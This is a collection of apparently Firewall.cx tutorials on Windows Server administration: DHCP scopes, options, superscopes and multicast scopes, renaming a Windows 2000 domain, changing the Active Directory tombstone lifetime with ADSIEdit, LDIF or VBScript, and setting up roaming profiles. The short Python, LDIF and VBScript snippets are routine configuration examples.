Without careful observation, the full capabilities of DHCP can be overlooked. The protocol, in combination with the DHCP MMC, provides numerous methods to control client configuration settings and server administrative functions.

  • Hits: 26802

Windows 2003 DHCP Server Advanced Configuration - Part 1

In this article, we will cover more advanced DHCP features and topics such as server options, superscopes, multicast scopes, dynamic DNS, DHCP database backup and restoration, DHCP migration, and DHCP troubleshooting. We will cover these topics in two ways: by building out from our earlier implementation and by using our imagination!

Ok, using our imagination for this purpose may seem silly but doing so will give us the opportunity to indirectly learn how, why, and where these advanced DHCP features and topics come into play in a real-world network and how other networking technologies are involved in a DHCP implementation.

We will imagine that we are building our DHCP server for a company that has two buildings, Building A and Building B, each with a single floor (for now). Building A is on a 192.168.0.0/24 network and Building B is on a 192.168.1.0/24 network.

Although each building has its own DNS server (192.168.0.252 and 192.168.1.252), WINS server (192.168.0.251 and 192.168.1.251) and Cisco Catalyst 4507R-E switch (192.168.0.254 and 192.168.1.254), only a single DHCP server exists – it is the one that we have been building and it resides in Building A.

The clients and servers in each building connect to their respective Cisco Catalyst switches and the switches are uplinked to a Cisco router for Internet connectivity. The only notable configuration is with the Building B switch: It is configured with the ip helper-address 192.168.0.253 command.

The ip helper-address command tells the switch to forward DHCP requests in the local subnet to the DHCP server, since the clients in Building B cannot initially communicate with the DHCP server directly. We are not concerned with any other configuration or networking technologies for now.

Server Options

The specifications of our imaginary company state that the company has two buildings – Building A and Building B. In our first article, we created a scope called “Building A, Floor 1” so a scope for our first building is already made. In this article, we will create a scope for Building B, Floor 1, using the instructions from our Basic DHCP Configuration article and the following specifications for the scope:

tk-windows-dhcp-2k3-advanced-1

After creating the scope, we want to activate it as well.

Notice that, in creating this scope, we had to input a lot of the same information from our “Building A, Floor 1” scope. In the event that we had several other scopes to create, we would surely not want to be inputting the same information each time for each scope.

That is where server options are useful. Server options allow you to specify options that all the scopes have in common. In creating two scopes, we noticed that our scopes had the following in common:

  • DNS servers
  • WINS servers
  • Domain name

To avoid having to enter this information again, we will create these options as server options. To do this:

1. On the DHCP MMC, right-click Server Options and choose Configure Options

tk-windows-dhcp-2k3-advanced-2

When the Server Options window comes up, take a moment to scroll down through the long list of available options. Not all options are needed or used in every environment. In some cases, however, a needed option is not available. For example, Cisco IP phones require Option 150 but because that option is not available it would have to be defined manually. Other than that, options 006 DNS Servers, 015 DNS Domain, and 003 Router are generally sufficient.

2. Scroll down to option 006 DNS Servers and place a checkmark in its box. This will activate the Data Entry section. In that section, type 192.168.0.252 for the IP Address and click Add. Then enter 192.168.1.252 as another IP Address and click Add again. This will add those two servers as DNS servers.

3. Scroll down to option 015 DNS Domain Name and place a checkmark in its box. This will activate the Data Entry section. In that section, enter firewall.cx in the String Value text field.

4. Scroll down to option 044 WINS/NBNS Servers and place a checkmark in its box. This will activate the Data Entry section. In that section, enter 192.168.0.251 for the IP Address and click Add. Then enter 192.168.1.251 as another IP Address and click Add again. This will add those two servers as WINS servers.

5. Scroll down to option 046 WINS/NBT Node Type and place a checkmark in its box to activate the Data Entry section. In that section, enter “0x8” for the Byte text field and click OK. This sets the workstation node type to 'Hybrid', which is the preferred type.

Back on the DHCP MMC, if you click on the Server Options node you will see the following:

tk-windows-dhcp-2k3-advanced-3

Subsequent scopes will inherit these options if no scope options are specified. However, if scope options are specified then the scope options would override the server options in assignment.
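To make the inheritance and override rule concrete, here is a small Python sketch; the option names and values mirror the ones configured above, while the scope-level DNS override is purely illustrative:

# Conceptual sketch: scope options override matching server options,
# everything else is inherited from the server level.
server_options = {
    "006 DNS Servers": ["192.168.0.252", "192.168.1.252"],
    "015 DNS Domain Name": "firewall.cx",
    "044 WINS/NBNS Servers": ["192.168.0.251", "192.168.1.251"],
}

scope_options = {
    "003 Router": "192.168.1.254",           # defined per scope
    "006 DNS Servers": ["192.168.1.252"],    # illustrative override of the server value
}

effective = {**server_options, **scope_options}   # scope values win on conflict
for name, value in sorted(effective.items()):
    print(f"{name}: {value}")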

If we did have Cisco IP phones in our environment we would define Option 150 as follows:

1. Right-click the server node on the DHCP MMC and choose Set Predefined Options

2. When the Predefined Options and Values window comes up, click Add

3. When the Options Type window comes up, type a name for the option such as “TFTP Server for Cisco IP Phones”.

4. On the Data Type drop-down menu, select IP Address.

5. On the Code text field, enter 150.

6. On the Description text field, type a description for the scope, such as “Used by Cisco IP Phones”.

7. Check the box next to Array

8. Click OK twice.

If you go back to the Scope/Server Options window again, you will see Option 150 available.

tk-windows-dhcp-2k3-advanced-4

Dynamic DNS

At this point, our imaginary network can service a significant number of clients, but those clients can only be referenced by IP address. Sometimes it is necessary or helpful to reference clients by their host names rather than IP addresses.

DNS resolves client host names to IP addresses. But for DNS to be able to do that, client host names and IP addresses must already be registered in DNS. Servers are typically registered manually in DNS by the administrator, but workstations are not. So how do client workstations get registered in DNS? The answer is to use dynamic DNS (DDNS), a feature that allows clients, or the DHCP server itself, to register clients in DNS automatically when a client is assigned an IP address. Fortunately, DDNS is set up to work automatically in a domain environment, provided that DNS is also set up correctly in the network.

To view the options available for DDNS:

  1. On the DHCP MMC, right-click the server node and choose Properties
  2. When the Properties window comes up, click the DNS tab.

If the network has some clients that are not in the domain, have legacy Windows operating systems, or are not capable of registering their host names and IP addresses in DNS, the two options marked below would need to be selected:

tk-windows-dhcp-2k3-advanced-5

But if that were the case, you would also have to specify credentials that the DHCP server would use for DDNS on behalf of the clients. To do this, you would:

  1. Click the Advanced tab on the Properties window.

tk-windows-dhcp-2k3-advanced-6

 

2. Click the Credentials button.

3. When the DNS Dynamic Update Credentials window comes up, enter an administrator username and password and firewall.cx for the domain. In a real-world environment, you would create a separate username and password that would be used solely for DDNS and enter it here instead.

4. Click OK twice to exit the Properties window.

Superscopes

Let us imagine that the number of client workstations in Floor 1 of Building A was expanded beyond the number of available IP addresses that our “Building A, Floor 1” scope could offer. What would we do to provide IP addresses to those additional clients?

The following options may appear to be solutions, but they are not always feasible:

  1. Extend the scope to include more IP addresses.
  2. Create an additional scope for that network segment.
  3. Delete and recreate the scope with a different subnet mask that allows for more hosts.

The problem with the first option is that you may not always be able to extend the scope, depending on the scope's subnet mask and whether consecutive scopes were created based on that subnetting. The problem with the second option is that even if you create an additional scope, the DHCP server would not automatically lease out those IP addresses to clients of that physical network segment. Although the third option could work, it may not always be optimal depending on how many additional network changes would also be needed to reach the solution.

There are a few options to solve this issue:

  1. Place the additional clients in a separate VLAN and create a scope for that VLAN that is in a completely different network
  2. Create a superscope that includes the exhausted scope and a new scope with available IP addresses

The first option could solve the problem but, since this is a DHCP article, we will address the problem by using DHCP features, so the second option will be our choice!

Superscopes allow you to join scopes from separate networks into one scope. Then, when one of the scopes runs out of IP addresses, the DHCP server would automatically start leasing out IP addresses from the other scopes in that superscope. However, solely creating a superscope is not the complete solution. As some clients in that network segment would have IP addresses from a different network, the segment's router interface would also have to be assigned an additional IP address that is in the same network as the additional scope.
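Conceptually, a superscope behaves like a simple fallback across address pools, as the Python sketch below models. The 192.168.2.0/24 network used for the extended scope here is an assumption purely for illustration; the real range comes from the scope specifications that follow:

# Conceptual sketch of superscope behaviour: when the first scope is
# exhausted, addresses are handed out from the next scope in the superscope.
from ipaddress import ip_network

superscope = [
    {"name": "Building A, Floor 1", "network": ip_network("192.168.0.0/24"), "leased": set()},
    {"name": "Building A, Floor 1 - Extended", "network": ip_network("192.168.2.0/24"), "leased": set()},
]

def next_free_address(scopes):
    for scope in scopes:
        for host in scope["network"].hosts():
            if str(host) not in scope["leased"]:
                scope["leased"].add(str(host))
                return scope["name"], str(host)
    return None, None

scope_name, address = next_free_address(superscope)
print(f"Leased {address} from scope '{scope_name}'")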

To use this solution, we first have to create the additional scope. Here are the scope specifications:

tk-windows-dhcp-2k3-advanced-7

The scope will inherit the server options for DNS domain name, DNS server and WINS server. Activate the scope when done.

Now we will create a superscope and place the two Building A scopes in it:

  1. On the DHCP MMC, right-click the server node and choose New Superscope
  2. When the New Superscope Wizard comes up, click Next
  3. On the next screen, you are prompted to enter a name for the scope. Enter “All of Building A, Floor 1” and click Next
  4. On the next screen, you are asked to select the scopes that will be part of the superscope. Select the scopes shown below and then click Next

tk-windows-dhcp-2k3-advanced-8

 

5. On the next screen, click Finish to complete the wizard.

Back on the DHCP MMC, you will see that the two scopes selected earlier have been placed under a new scope – “Superscope All of Building A, Floor 1”.

tk-windows-dhcp-2k3-advanced-9

 

Now when the scope titled “Building A, Floor 1” runs out of IP addresses, the server will start issuing IP addresses in “Building A, Floor 1 – Extended”.

Multicast Scopes

The most common systems and applications that use multicasting have multicast IP addresses statically configured or hard-coded in some way. However, for systems and applications that need multicast IP addresses dynamically assigned, they lease them from a MADCAP (Multicast Address Dynamic Client Allocation Protocol) server, such as Windows Server 2003.

One example of an application that leases multicast IP addresses from a MADCAP server is Phone Dialer, an old application included with Windows 2000. This application allowed the creation of video conferences that people could attend. When creating a conference, the application would lease a multicast IP address from the MADCAP server and stream to that IP address. Clients wishing to join the conference would “join” that established multicast group.

Setting up a multicast scope is similar to setting up a standard scope:

  1. On the DHCP MMC, right-click the server node and choose New Multicast Scope
  2. When the New Multicast Scope Wizard comes up, click Next
  3. On the next screen, specify a Scope Name of “Video Conferencing” and a Scope Description of “Multicast scope for conference presenters.” Afterwards, click Next

tk-windows-dhcp-2k3-advanced-10

4. On the next screen, enter 239.192.1.0 in the Start IP Address field and 239.192.1.255 in the End IP Address field. Since this scope will only service video conferences within the company, we define an IP address range in the multicast organization-local scope range (a quick way to verify this is shown after the steps below). Leave the TTL at 32. Click Next when done.

 

tk-windows-dhcp-2k3-advanced-11

  5. On the next screen, click Next again. No exclusions need to be defined.
  6. On the next screen, set the Days to 1 and click Next
  7. On the next screen, click Next to activate the scope.
  8. On the next screen, click Finish
  9. Back on the DHCP MMC, expand the multicast scope that we just created and select Address Pool . Notice that an exclusion range encompassing the entire pool is also created. Select it and delete it.
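As mentioned in step 4, a quick way to confirm that the chosen range sits inside the organization-local multicast scope (239.192.0.0/14, per RFC 2365) is with Python's ipaddress module:

# Check that the multicast range entered in step 4 is organization-local.
from ipaddress import ip_address, ip_network

ORG_LOCAL = ip_network("239.192.0.0/14")
start, end = ip_address("239.192.1.0"), ip_address("239.192.1.255")
print(start in ORG_LOCAL and end in ORG_LOCAL)   # True - the range is valid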

The DHCP server can now provide multicast IP addresses. For the most part, the multicast scope functions the same as a standard scope. One different feature is that you can set a multicast scope to automatically expire and delete itself at a certain time.

To configure this:

  1. Right-click the multicast scope and choose Properties
  2. When the Properties window comes up, click the Lifetime tab.
  3. On the Lifetime tab, select “Multicast scope expires on” and select when you would like it to expire. When this date and time is reached, the server automatically deletes the scope.

Conclusion

The Advanced DHCP configuration article continues with part 2, covering the DHCP database backup and restoration, troubleshooting the DHCP service using audit logs and finally DHCP Migration.

To continue with our article, please click here: Windows 2003 Advanced DHCP Server Configuration - Part 2.

  • Hits: 56196

Windows 2003 DHCP Server Installation & Configuration

DHCP (Dynamic Host Configuration Protocol) is a protocol that allows clients on a network to request network configuration settings from a server running the DHCP server service which, in our case, will be Windows Server 2003. Additionally the protocol allows the clients to self-configure those network configuration settings without the intervention of an administrator. Some of the settings that a DHCP server can provide to its clients include the IP addresses for the DNS servers, the IP addresses for the WINS servers, the IP address for the default gateway (usually a router) and, of course, an IP address for the client itself.

This article will discuss and walk you through the steps of installing and configuring DHCP on a Windows Server 2003 member server, specifically focusing on setting up a scope and its accompanying settings. The same configuration can be applied to a standalone server even though the step-by-step details differ slightly. The upcoming 'Advanced DHCP Server Configuration on Windows 2003' article will discuss other DHCP options and features such as superscopes, multicast scopes, dynamic DNS, DHCP Backup and more.

While our articles make use of specific IP addresses and network settings, you can change these settings as needed to make them compatible with your LAN – This won't require you to make changes to your LAN, but you'll need to have a slightly stronger understanding of DHCP and TCP/IP.

Assigning the Server a Static IP Address

Before we install the DHCP server service on Windows Server 2003, we need to assign the Windows server a static IP address. To do this:

1. Go to Start > Control Panel > Network Connections , right-click Local Area Connection and choose Properties .

2.  When the Local Area Connection Properties window comes up, select Internet Protocol (TCP/IP) and click the Properties button.

3.  When the Internet Protocol (TCP/IP) window comes up, enter an IP address , subnet mask and default gateway IP address that is compatible with your LAN.

We've configured our settings according to our network, as shown below:

tk-windows-dhcp-2k3-basic-1

4. Enter 192.168.0.252 for the Preferred DNS server and 192.168.1.252 for the Alternate DNS server. The Preferred and Alternate DNS server IP addresses are optional for the functionality of the DHCP server, but we will populate them since you typically would in a real-world network. Usually these fields are populated with the IP addresses of your Active Directory domain controllers.

5. After filling out those fields, click OK and OK to save and close all windows.

Install DHCP Server Service on Windows Server 2003

Our server now has a static IP address and we are now ready to install the DHCP server service. To do this:

1. Go to Start > Control Panel > Add or Remove Programs .

2. When the Add or Remove Programs window launches, click Add/Remove Windows Components in the left pane.

3. When the Windows Components Wizard comes up, scroll down and highlight Networking Services and then click the Details button.

tk-windows-dhcp-2k3-basic-2

4. When the Networking Services window comes up, place a check mark next to Dynamic Host Configuration Protocol (DHCP) and click OK and OK again.

tk-windows-dhcp-2k3-basic-3

Note that, during the install, Windows may generate an error claiming that it could not find a file needed for DHCP installation. If this happens, insert your Windows Server 2003 CD into the server's CD-ROM drive and browse to the i386 directory. The wizard should automatically find the file and allow you to select it. After that, the wizard should resume the installation process.

Configure DHCP on Windows Server 2003

DHCP has now been successfully installed and we are ready to configure it. We will create a new scope and configure some of the scope's options. To begin:

1. Launch the DHCP MMC by going to Start > Administrative Tools > DHCP .

Currently, the DHCP MMC looks empty and the server node in the left pane has a red arrow pointing down. Keep that in mind because it will be significant later on.

tk-windows-dhcp-2k3-basic-4

2. Right-click the server node in the left pane and choose New Scope . This will launch the New Scope Wizard.

3. On the New Scope Wizard, click Next .

4. Specify a scope name and scope description. For the scope Name , enter “ Building A, Floor 1 .” For the scope Description , enter “ This scope is for Floor 1 of Building A .” Afterwards, click Next .

tk-windows-dhcp-2k3-basic-5

The scope name can be anything, but we certainly want to name it something that describes the scope's purpose. The scope Description is not required. It is there in case we needed to provide a broader description of the scope.

5. Specify an IP address range and subnet mask. For the Start IP address enter 192.168.0.1, for the End IP address enter 192.168.0.254 . Finally, specify a subnet mask of 255.255.255.0 and click Next.

Specifying the IP address range of a scope requires some knowledge of subnetting. Each scope in a DHCP server holds a pool of IP addresses to give out to clients, and the range of IP addresses must be within the allowed range of the subnet (that you specify on the subnet mask field).

For simplicity we entered a classful, class C IP address range from 192.168.0.1 to 192.168.0.254. Notice that the range encompasses the IP address of our server, the DNS servers and the default gateway, meaning that the DHCP server could potentially assign a client an IP address that is already in use! Do not worry -- we will take care of that later.

tk-windows-dhcp-2k3-basic-6

 

6. Specify IP addresses to exclude from assignment. For the Start IP address , enter 192.168.0.240 and for the End IP address enter 192.168.0.254 , click Add , and then click Next.

tk-windows-dhcp-2k3-basic-7

 

Certain network devices, such as servers, will need statically configured IP addresses. The IP addresses may sometimes be within the range of IP addresses defined for a scope. In those cases, you have to exclude the IP addresses from being assigned out by DHCP.

We have the opportunity here to define those IP addresses that are to be excluded. We specified IP addresses 192.168.0.240 to 192.168.0.254 to ensure we've included our servers plus a few spare IP addresses for future use.
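A quick way to see what the exclusion leaves behind is to compute the usable pool with Python's ipaddress module; the range and exclusion below are the ones we just entered:

# Count the addresses the scope can actually lease once the exclusion applies.
from ipaddress import ip_address, ip_network

scope = ip_network("192.168.0.0/24")
range_start, range_end = ip_address("192.168.0.1"), ip_address("192.168.0.254")
excl_start, excl_end = ip_address("192.168.0.240"), ip_address("192.168.0.254")

usable = [h for h in scope.hosts()
          if range_start <= h <= range_end and not (excl_start <= h <= excl_end)]
print(len(usable))   # 239 addresses remain available for clients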

7. Specify the lease duration for the scope. Verify that Days is 8 and click Next.

The lease duration is how long clients should keep their IP addresses before having to renew them.

tk-windows-dhcp-2k3-basic-8

There are a few considerations at this point. If a short lease duration is configured, clients will be renewing their IP addresses more frequently. The result will be additional network traffic and additional strain on the DHCP server. On the other hand if a long lease duration is configured, IP addresses previously obtained by decommissioned clients would remain leased and unavailable to future clients until the leases either expire or are manually deleted.

Additionally if network changes occur, such as the implementation of a new DNS server, those clients would not receive those updates until their leases expire or the computers are restarted.

As Microsoft states, “lease durations should typically be equal to the average time the computer is connected to the same physical network.” You would typically leave the default lease duration in an environment where computers are rarely moved or replaced, such as a wired network. In an environment where computers are often moved and replaced, such as a wireless network, you would want to specify a short duration since a new wireless client could roam within range at any time.
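For reference, clients do not wait for the lease to expire before renewing: under the RFC 2131 defaults they attempt a renewal at 50% of the lease (T1) and a rebind at 87.5% (T2). A small Python sketch with our 8-day lease (the start time is only an example):

# Renewal (T1) and rebinding (T2) times for an 8-day lease, RFC 2131 defaults.
from datetime import datetime, timedelta

lease = timedelta(days=8)
obtained = datetime(2024, 1, 1, 9, 0)     # example lease start time

print("Renew (T1):  ", obtained + lease * 0.5)
print("Rebind (T2): ", obtained + lease * 0.875)
print("Expires:     ", obtained + lease)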

8. Configure DHCP Options. Make sure “ Yes, I want to configure these settings now ” is selected and click Next to begin configuring DHCP options.

DHCP options are additional settings that the DHCP server can provide to clients when it issues them with IP addresses. These are the other settings that help clients communicate on the network. In the New Scope Wizard we can only configure a few options but from the DHCP MMC we have several more options.

9. Specify the router IP address. Enter 192.168.0.254 as the IP address of the subnet's router, click Add , and then click Next .

The first option we can configure is the IP address for the subnet's router for which this scope is providing IP addresses. Keep in mind that this IP address must be in the same network as the IP addresses in the range that we created earlier.

tk-windows-dhcp-2k3-basic-9

 

10. Configure domain name and DNS servers. On the next page, enter “firewall.cx" for the domain name. Then enter 192.168.0.252 for the IP address of a DNS server, click Add , enter 192.168.1.252 as the IP address for another DNS server, and click Add again. When finished, click Next.

If you had a DNS infrastructure in place, you could have simply typed in the fully qualified domain name of the DNS server and clicked Resolve .

The DNS servers will be used by clients primarily for name resolution, but also for other purposes that are beyond the scope of this article. The DNS domain name will be used by clients when registering their hostnames to the DNS zones on the DNS servers (covered in the 'Advanced DHCP Server Configuration on Windows 2003' article).

tk-windows-dhcp-2k3-basic-10

 

11. Configure WINS servers. On the next screen, enter 192.168.0.251 as the IP address for the first WINS server, click Add , enter 192.168.1.251 as the IP address for the second WINS server, click Add again, and then click Finish .

tk-windows-dhcp-2k3-basic-11

 

12. Finally, the wizard asks whether you want to activate the scope. For now, choose “ No, I will activate this scope later ” and click Next and then Finish to conclude the New Scope Wizard and return to the DHCP MMC.

At this point we almost have a functional DHCP server. Let us go ahead and expand the scope node in the left pane of the DHCP MMC to see the new available nodes:

•  Address Pool – Shows the IP address range the scope offers along with any IP address exclusions.

•  Address Leases – Shows all the leased IP addresses.

•  Reservations – Shows the IP addresses that are reserved. Reservations are made by specifying the MAC address that the server would “listen to” when IP address requests are received by the server. Certain network devices, such as networked printers, are best configured with reserved IP addresses rather than static IP addresses.

•  Scope Options – Shows configured scope options. Some of the visible options now are router, DNS, domain name and WINS options.

•  Server Options – Shows configured server options. This is similar to scope options except that these options are either inherited by all the scopes or overridden by them (covered in 'Advanced DHCP Server Configuration on Windows 2003' article).

Earlier, we only defined exclusions for our servers, router plus a few more spare IP addresses. In case you need to exclude more IP addresses, you can do it at this point by following these instructions:

13. Select and right-click Address Pool and choose New Exclusion Range.

14. When the Add Exclusion window comes up, enter the required range and then click Add. In our example, we've excluded the additional range 192.168.0.230 - 192.168.0.232.

tk-windows-dhcp-2k3-basic-12

Notice that the server node and scope node still have a red arrow pointing down. These red arrows pointing down mean that the server and scope are not “turned on”.

The concept of “turning on” the scope is called “activating” and the concept of “turning on” the server for DHCP service is called “authorizing”. Authorization is partly a security measure: to authorize a DHCP server, you must be a member of the Enterprise Admins Active Directory group.

15. Right-click the server (server001.firewall.cx) and choose Authorize , then right-click the scope (Building A, Floor 1) and choose Activate . If the red arrows remain, refresh the MMC by going to Action > Refresh .

tk-windows-dhcp-2k3-basic-13

Congratulations! At this point, you should have a working DHCP server capable of providing IP addresses!

  • Hits: 103862

Renaming Windows 2000 Domain Name

Sometimes renaming a domain is an essential business requirement. There are many situations, such as mergers, change of company name or migration from a test environment to a production environment, that require you to change the existing domain name.

However, changing a domain name in Windows Server 2000 is not a simple or straightforward process. It is a time consuming and complex procedure, which requires extensive work.

The renaming of a Windows 2000 domain may impact other server applications that are running in the domain, such as Exchange Server and other custom applications that are closely integrated with Active Directory and use hard coded NETBIOS names.

The major task in renaming a domain is to revert the Windows 2000 domain controller to Windows NT and then upgrade it back to Windows 2000 with a new DNS (FQDN) name. If there is more than one domain controller in the domain then all the Windows 2000 domain controllers must be demoted to member servers before renaming the desired domain controller.

Requirements

Renaming the Windows 2000 domain is only possible if the functional level of the domain is set to mixed mode. The Windows 2000 mixed mode functional level means that NT 4.0 BDCs can exist in the domain/forest. The functional level of the domain must be in mixed mode because you need to use an NT 4.0 BDC to complete the renaming procedure.

Note: If the default functional level of the domain is set to native mode, you cannot revert to mixed mode and cannot rename the domain.

If you have one or more child domains then you have to downgrade all the child domains to Windows NT before downgrading the parent domain. You then need to upgrade the parent domain with the new FQDN and then upgrade the child domain(s).

Steps To Be Taken

To rename a Windows 2000 domain, you need to follow these steps:

1. Verify that at least one Windows NT 4.0 BDC, having Service Pack 6 or 6a installed on it, exists in the domain.

2. Backup all the domain controllers in the domain.

3. If required, install another Windows NT 4.0 BDC in the domain and force replication to ensure that the backup of all the security information, domain user accounts and SAM database exists. You can use net accounts /sync command on the Windows NT 4.0 BDC to force replication.

4. If you have just one domain controller, simply isolate it from the network by removing all the cables.

If you have more than one domain controller, you need to demote all the Windows 2000 domain controllers to member servers, leaving just one Windows 2000 domain controller, by using dcpromo command.

Then isolate the last Windows 2000 domain controller after ensuring that a Windows NT 4.0 BDC is present on the network.

5. Demote the last Windows 2000 domain controller by using dcpromo command ensuring that the last domain controller option is selected as the domain option.

Note: To run dcpromo command on the last Windows 2000 domain controller, connect it to an isolated active hub because dcpromo command requires an active connection.

6. Promote Windows NT BDC to a PDC and then upgrade it to Windows 2000.

7. Provide the desired domain name at the time of Active Directory installation.

8. Promote all the demoted member servers back to Windows 2000 domain controllers by running dcpromo on them.

Article Summary

In this article we have seen the different scenarios and methods of renaming a Windows 2000 domain. We have learnt that renaming a Windows 2000 domain is a fairly complex process. We must keep in mind that changing domain name in Windows 2000 should not be performed unless it is absolutely necessary.

Careful planning while deciding on the FQDN/DNS name of the Windows 2000 domain at the time of installation can avoid the trouble of renaming a Windows 2000 domain.

If you have found the article useful, we would really appreciate you sharing it with others by using the provided services on the top left corner of this article. Sharing our articles takes only a minute of your time and helps Firewall.cx reach more people through such services.

  • Hits: 22797

Active Directory Tombstone Lifetime Modification

A tombstone is what remains of an object after it is deleted from Active Directory. When an object is deleted, it is not physically removed from Active Directory for some days. Rather, Active Directory sets the 'isDeleted' attribute of the deleted object to TRUE, strips most of its attributes and moves it to a special hidden container called CN=Deleted Objects; the stripped object is referred to as a tombstone.

Tombstones cannot be accessed through normal directory searches or through the Microsoft Management Console (MMC) snap-ins. However, tombstones are visible to the directory replication process, so they are replicated to all the domain controllers in the domain. This ensures that the deletion is applied to every domain controller throughout Active Directory.

The tombstone lifetime attribute contains the time period after which the object is physically deleted from Active Directory. The default value for the tombstone lifetime attribute is 60 days. However, you can change this value if required. Usually the tombstone lifetime value is kept longer than the expected replication latency between the domain controllers, so that a tombstone is not deleted before it has been replicated across the forest.


The tombstone lifetime value is the same on all the domain controllers, and a given tombstone is deleted from all the servers at the same time. This is because the expiration of a tombstone is based on the time when the object was logically deleted from Active Directory, rather than the time when it was received as a tombstone on a server through replication.
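In other words, every domain controller computes the same purge time from the original deletion timestamp. A small Python sketch of that calculation (the deletion time shown is only an example):

# A tombstone is purged tombstoneLifetime days after the original deletion,
# regardless of when each DC received it through replication.
from datetime import datetime, timedelta

tombstone_lifetime_days = 60                 # the default value
deleted_at = datetime(2024, 3, 1, 14, 30)    # example logical deletion time

print("Purged on or after:", deleted_at + timedelta(days=tombstone_lifetime_days))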

Changing Tombstone Lifetime Attribute

The tombstone lifetime attribute can be modified in three ways: Using ADSIEdit tool, using LDIF file, and through VBScript.

Using ADSIEdit Tool

The easiest method to modify tombstone lifetime in Active Directory is by using ADSIEdit. The ADSIEdit tool is not installed automatically when you install Windows Server 2003. You need to install it separately by installing the support tools from the Windows Server 2003 CD.
If you haven't got your CDs in hand, you can simply download the Windows 2003 SP1 Support Tools from Firewall.cx here.
To install ADSIEdit tool and to modify tombstone lifetime in Active Directory using this tool, you need to:

  1. Insert the Windows Server 2003 CD.
  2. Browse the CD to locate the Support\Tools directory.
  3. Double-click the suptools.msi to proceed with the installation of support tools.
  4. Select Run command from the Start menu.
  5. Type ADSIEdit.msc to open the ADSI Editor, as shown below:

tk-windows-tombstone-1

The ADSI Edit window appears:
tk-windows-tombstone-2

6. Expand the Configuration node, then expand the CN=Configuration,DC=Firewall,DC=cx node.
7. Expand the CN=Services node.
8. Drill down to CN=Directory Service under CN=Windows NT , as shown in the figure below:
tk-windows-tombstone-3

9. Right-click CN=Directory Service and select Properties from the menu that appears
The CN=Directory Service Properties window appears, as shown below:
10. Double-click the tombstoneLifetime attribute in the Attributes list.
tk-windows-tombstone-4

The Integer Attribute Editor window appears, as shown below:
tk-windows-tombstone-5

11. Set the number of days that tombstone objects should remain in Active Directory in the Value field.
12. Click OK .
The Tombstone Lifetime has now been successfully changed.

Other Ways Of Changing The Tombstone Lifetime Attribute

Using an LDIF file

To change the tombstone lifetime attribute using an LDIF file, you need to create the LDIF file using Notepad and then execute it using the LDIFDE tool. To do this:
1. Create a text file using notepad with the following content:

dn: cn=Directory Service,cn=Windows NT,cn=Services,cn=Configuration,<ForestRootDN>
changetype: modify
replace: tombstoneLifetime
tombstoneLifetime: <NumberOfDays>
-

2. Provide the appropriate values in the text between <>. For example, put the distinguished name of your Active Directory forest root domain (such as DC=Firewall,DC=cx) in place of <ForestRootDN> and put the number of days you want to set for the tombstone lifetime in place of <NumberOfDays>.

3. Don't forget to put "-" on the last line.

4. Save the file with .ldf extension.

5. Open the Command Prompt and type the following command:

c:\> ldifde -v -i -f <Path to tombstoneLifetime.ldf>

The Tombstone Lifetime is now successfully changed.

Using a VBScript

To change tombstone lifetime using VBScript, you need to type the following code with appropriate values and execute the script.

intTombstoneLifetime = <NumberOfDays>
Set objRootDSE = GetObject("LDAP://RootDSE")
Set objDSCont = GetObject("LDAP://cn=Directory Service,cn=Windows NT," & _
    "cn=Services," & objRootDSE.Get("configurationNamingContext"))
objDSCont.Put "tombstoneLifetime", intTombstoneLifetime
objDSCont.SetInfo
WScript.Echo "The tombstone lifetime is set to " & intTombstoneLifetime

Article Summary

This article explained what the Active Directory tombstone is and how you can change the tombstone lifetime to control when deleted objects are finally purged by the Active Directory replication process. We covered three different methods in enough detail for any Windows administrator to carry out these changes.

  • Hits: 56753

Configuring Windows Server Roaming Profiles

Windows roaming profiles allow the mobile users of a company to always work with their personal settings from any network computer in a domain. Roaming profiles are a collection of a user's personal settings, saved at a central location on the network.

These settings and configurations are recovered on any network computer as soon as users log in with their credentials.

The roaming user profiles functionality is very useful because it allows mobile users to log on to a variety of computers located at different places and get the same look and feel of their own personalized desktops. However, roaming user profiles in Windows Server 2003 does not allow you to use encrypted files.

A roaming profile is made up of folders that appear under the <username> folder under Documents and Settings, as shown below:

tk-windows-roaming-profiles-1

The detailed description of each folder is as follows:

  • Desktop: This folder contains all the files, folders, and shortcuts data that is responsible for the appearance of your desktop screen.
  • Favorites: This folder contains the shortcuts of the favorite and frequently visited websites of the user.
  • Local Settings: This folder contains temporary files, history, and the application data.
  • My Documents: This folder contains documents, music, pictures, and other items.
  • Recent: This folder contains shortcuts to the files and folders most recently accessed by the user.
  • Start Menu: This folder contains the Start menu items.
  • Cookies: This folder contains all cookies stored on the user's computer.
  • NetHood: This folder contains shortcuts to sites in My Network Places .
  • PrintHood: This folder contains the shortcuts of printers configured for the user's computer.
  • Application Data: This folder contains the program-specific and the security settings of the applications that the user has used.
  • Templates: This folder contains the templates for applications such as Microsoft Word and Excel.
  • SendTo: This folder contains the popular Send To destination on right-clicking a menu.

Creating Roaming User Profiles

You can create roaming user profiles on Windows NT Server 4.0, Windows 2000 Server, or Windows Server 2003 based computers. In addition, you can use a Windows NT Workstation 4.0, Windows XP Professional, or Windows 2000 Professional based computer that is running the Windows NT Server Administration Tools to create roaming user profiles.

The three major steps involved in creating a roaming user profile include creating a temporary user profile on a local computer, copying that profile to a network server, and then defining the user's profile location through the group policy.

To create a roaming user profile, follow the steps given below:

1. Log on as Administrator, or as a member of the local Administrators group or the Account Operators group in the domain:

tk-windows-roaming-profiles-2

 

2. Open Administrative Tools in the Control Panel and then click Active Directory Users and Computers, as shown above.

3. Click the Users folder under the Local Users and Groups node, right-click Users and then click New User in the menu that appears, as shown below:

Note: If you are using Active Directory then click Users folder under Active Directory Users and Computers node.

tk-windows-roaming-profiles-3

The New User dialog box appears as shown below.

 

4. Provide the User logon name and the Password for the user for whom the roaming profile is being created in their respective fields. Click on Next:

tk-windows-roaming-profiles-4

 

5. Enter the user password and clear the User must change password at next logon option as shown below:

tk-windows-roaming-profiles-4a

 

6. Click Create , click Close, and then quit the Computer Management snap-in.

7. Log off the computer and then Log on to your workstation using the user account that you have just created on your server.

8. Verify that a folder with the user name is created under the Documents and Settings folder, as shown below:

tk-windows-roaming-profiles-5

9. Configure your desktop by adding shortcuts and modifying its appearance.

10. Configure the Start menu by adding desired options to it.

11. Log off.

Copying The Profile To Your Server

A temporary profile with all the required settings is configured on your local computer. You need to now copy this local profile to a network server which can be accessed centrally by all the computers.

Try not to use a domain controller for this purpose; domain controllers have many other tasks to do, so it is better to keep them away from this role. You can, however, choose a member server for this purpose. Make sure that the member server you choose is regularly backed up, otherwise you may lose all your roaming profiles.

To copy the profile to a network server, you need to:

1. Log on as Administrator and then create a Profile folder on a network server.

